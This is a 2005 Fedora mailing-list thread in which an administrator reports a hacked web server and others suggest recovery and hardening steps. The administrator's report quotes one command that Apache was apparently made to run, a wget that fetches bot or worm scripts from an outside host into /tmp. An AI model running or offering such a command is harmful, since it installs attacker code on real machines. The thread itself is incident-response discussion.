On Thu, 17 Feb 2005 22:20:02 -0800 (PST), paul@xxxxxxxxxxxxxxxxxxx <paul@xxxxxxxxxxxxxxxxxxx> wrote:
Apparently someone has hacked into my webserver. And is installing perl scripts into he /tmp/ directory. There usually named .linuxday* or .cinta* and a few other names as well.
From what I can tell something is causing apache to run a command like"sh wget bot.linuxday.com.br -O {the above mentioned files are than listed}"
sometimes the site is worm.linuxday.com.br
I'm curious if anyone has heard about this before. I'm currently running Fedora 1 with all the latests security patches.
The only way to ensure your system is clean, and likely to remain clean, is to:
1. Do a bare metal install 2. Change all passwords to new strong passwords 3. Disable cleartext services, ftp, telnet, rsh, etc. 4. Disable root remote login (use su or sudo) 5. Restore your uncompromised data 6. etc. I had to do this for a client and the next 3 days the intruder tried to get back in.
-- Leonard Isham, CISSP Ostendo non ostento.
-- fedora-list mailing list fedora-list@xxxxxxxxxx To unsubscribe: http://www.redhat.com/mailman/listinfo/fedora-list
In replace of FTP what would you suggest. That is the only clear text password service I allow. So what else can I use in replace of that.
And shell access is denied for all accounts. except for 2.
I get the feeling this came in on awstats all though I'm not 100% positive and I'm wanting to find out how it got in first before I just delete and restart over again.
That AWStats hit me a couple times, which sucked. I had all kinds of cool movies put on the server by whoever popped it.
But in all seriousness, vsftpd uses tls/ssl connections, so you can avoid cleartext passwords altogether. It's working quite nicely for me.
Hope that helps -dant
